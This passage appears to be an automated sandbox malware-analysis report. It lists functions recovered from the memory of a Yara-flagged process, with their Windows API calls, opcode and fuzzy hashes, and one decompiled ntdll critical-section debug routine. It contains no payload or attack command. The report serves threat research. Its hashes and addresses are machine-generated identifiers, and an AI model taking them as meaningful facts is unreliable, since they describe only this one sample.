                                                          Uniqueness Score: -1.00%

                                                          Function 00CF8691, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00CECF92,00CECF92,?,00000000,?,?), ref: 00CF8650
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 99eb9cef55628936e0f5943233384b09fa82c1fe6c9114427b385d86c4d15e51
                                                          • Instruction ID: 9adb7fc3c138cc1dbd0034d4d7e6e9284411b3329fc79800889ed6ebddc74602
                                                          • Opcode Fuzzy Hash: 99eb9cef55628936e0f5943233384b09fa82c1fe6c9114427b385d86c4d15e51
                                                          • Instruction Fuzzy Hash: 78E06DB56002186BDB20EF44CC85FEB3799AF85750F058158BE08A7242CA31E8198AF1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CED432, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00CE7C63,?), ref: 00CED42B
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: bdb44274abba0d9acd5a7cde8a7c66ee1c39e1635d298f4682e1135f86454df8
                                                          • Instruction ID: 9b90fb449c92aaf5466e2da69bcd2b4004692fec51f9bff873607f67704215ba
                                                          • Opcode Fuzzy Hash: bdb44274abba0d9acd5a7cde8a7c66ee1c39e1635d298f4682e1135f86454df8
                                                          • Instruction Fuzzy Hash: A9E02672B802083BE700EAA5CC07FAA63D5DF24740F198024F90EDB3D3F550D8025592
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF8480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00CF3506,?,00CF3C7F,00CF3C7F,?,00CF3506,?,?,?,?,?,00000000,00000000,?), ref: 00CF84AD
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction ID: e7936c625954c903276ef2b8b59dfaf20e5f17d6d7458657dced970b2ee1e04e
                                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                          • Instruction Fuzzy Hash: 57E012B1200208ABDB14EF99CC41EA777ACAF88650F118558BA085B282CA30F9148AF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF8620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00CECF92,00CECF92,?,00000000,?,?), ref: 00CF8650
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction ID: 5e5766a1f532b6e7400ccd9066976d79d5790dc546f799c364d46a5e777cb047
                                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                          • Instruction Fuzzy Hash: 3FE01AB12002086BDB10DF49CC85EE737ADAF88650F018154BA0857241CA30E8148BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CED3FC, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00CE7C63,?), ref: 00CED42B
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 26b6f40d1684204baae5882808f53fcf8fa335cd6d11d4d3723c7ce189f2ad5b
                                                          • Instruction ID: 86950ec2934d412009df7f872c9e29aabeab866df356a1d5198642a2b9494e2e
                                                          • Opcode Fuzzy Hash: 26b6f40d1684204baae5882808f53fcf8fa335cd6d11d4d3723c7ce189f2ad5b
                                                          • Instruction Fuzzy Hash: 7FD05B717902043BE710EBA49C03F6A67D59F65740F194064F54EEB3C3E660D5014555
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CED400, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008003,?,?,00CE7C63,?), ref: 00CED42B
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                          • Instruction ID: 52140b1dd9745a957a44a189d34ad20116d2b1cc8bbab3ac1bdd8d6804a7f6e3
                                                          • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                          • Instruction Fuzzy Hash: 8BD0A7717903083BE610FAA49C03F2632CD9B54B00F494064FA49D73C3D960F5004165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 41d93378892dd5e8daacacb8dad9203ebda9fd89c0605ba40196e64f00306d41
                                                          • Instruction ID: a13532dc1dccb752cc34fbc4fd8f3c4805fa332300264f0cfe5a1d965929ae3a
                                                          • Opcode Fuzzy Hash: 41d93378892dd5e8daacacb8dad9203ebda9fd89c0605ba40196e64f00306d41
                                                          • Instruction Fuzzy Hash: 5CB02B71C010C0C9E610D3A00608B273A407BD0300F12C021D2020280A0378C0C0F2B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 00CF62AB, Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dc3b7ff1f7e3bcc8d73fe56363f9e1b4d0f36023293b94235e4e1b965db0f1c6
                                                          • Instruction ID: 5aef47305b0a23cde110f49fa620576effefb049341a851b854b3003bbd17357
                                                          • Opcode Fuzzy Hash: dc3b7ff1f7e3bcc8d73fe56363f9e1b4d0f36023293b94235e4e1b965db0f1c6
                                                          • Instruction Fuzzy Hash: A2C01217E89158454510CD597C410B5F374D5C393DF45575FDECBA34015502D8164195
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CEC3CC, Relevance: .0, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b5299e8d9f1b3f525c2f5ed74b92d7d67fa2a16c6c8c24ad72245952a4956c57
                                                          • Instruction ID: 6ef8c7d9343f4bcf5036fd6def96d7325810e0198b61cf8f51355be7110bf7fb
                                                          • Opcode Fuzzy Hash: b5299e8d9f1b3f525c2f5ed74b92d7d67fa2a16c6c8c24ad72245952a4956c57
                                                          • Instruction Fuzzy Hash: ACD01227F061640BC515CD5FA4850A4F370DA43529F44179BD857675029905D0535BC9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CEC358, Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9dd4ee2d04316ec67fa473ddfd13eeb62f82e8122115f630d4aef723111afa15
                                                          • Instruction ID: fdc3667068a9ddf93a90bb72a011c020a5d26cad1d6b4a95b198b6533fb3869a
                                                          • Opcode Fuzzy Hash: 9dd4ee2d04316ec67fa473ddfd13eeb62f82e8122115f630d4aef723111afa15
                                                          • Instruction Fuzzy Hash: 44C08017F090A847C125CD0F64911F0F7F4D143259F542797CCC7630015502C41311C9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF581F, Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 65f92e1243054b203914819242f4ebe4f211e5642188d3017db6264f8602c816
                                                          • Instruction ID: bd9ab62c7587d406d91939cf960011b384bc3bb2a35dede479394500ec610670
                                                          • Opcode Fuzzy Hash: 65f92e1243054b203914819242f4ebe4f211e5642188d3017db6264f8602c816
                                                          • Instruction Fuzzy Hash: 2DC08C67B22228090848183E70001E0F7A2A2C38A691632A3ED08E32004002C818038C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CE6A9D, Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 161d13672a29c7e0426a92e494ae33a2837cb69a34c95f908756a1b40bfb9b72
                                                          • Instruction ID: ce40bcf8433e59cf86579ad4f42ee7217282173b649a99c74c2eddfd723f58e3
                                                          • Opcode Fuzzy Hash: 161d13672a29c7e0426a92e494ae33a2837cb69a34c95f908756a1b40bfb9b72
                                                          • Instruction Fuzzy Hash: 1AB09233A5A10402D220084C78402B0E3A8D343128E202397A808A72008483C851018A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0574FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E0574FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E056FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05745720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05745720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                          0x0574fdda
                                                          0x0574fde2
                                                          0x0574fde5
                                                          0x0574fdec
                                                          0x0574fdfa
                                                          0x0574fdff
                                                          0x0574fe0a
                                                          0x0574fe0f
                                                          0x0574fe17
                                                          0x0574fe1e
                                                          0x0574fe19
                                                          0x0574fe19
                                                          0x0574fe19
                                                          0x0574fe20
                                                          0x0574fe21
                                                          0x0574fe22
                                                          0x0574fe25
                                                          0x0574fe40

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0574FDFA
                                                          Strings
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0574FE2B
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0574FE01
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                          • API String ID: 885266447-3903918235
                                                          • Opcode ID: 55c85b6d2c0717bb7b3719aa3420e87c0b29106d154617b7f933c31ff1710689
                                                          • Instruction ID: 5ec337133f523a50b8731b1981ecdefcf09049f81b1737af914fe36ca860914d
                                                          • Opcode Fuzzy Hash: 55c85b6d2c0717bb7b3719aa3420e87c0b29106d154617b7f933c31ff1710689
                                                          • Instruction Fuzzy Hash: CAF0F676644601BFE6211A45DC0AF23BB5AEB44730F144314F628565D1DA72FC20EBF4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%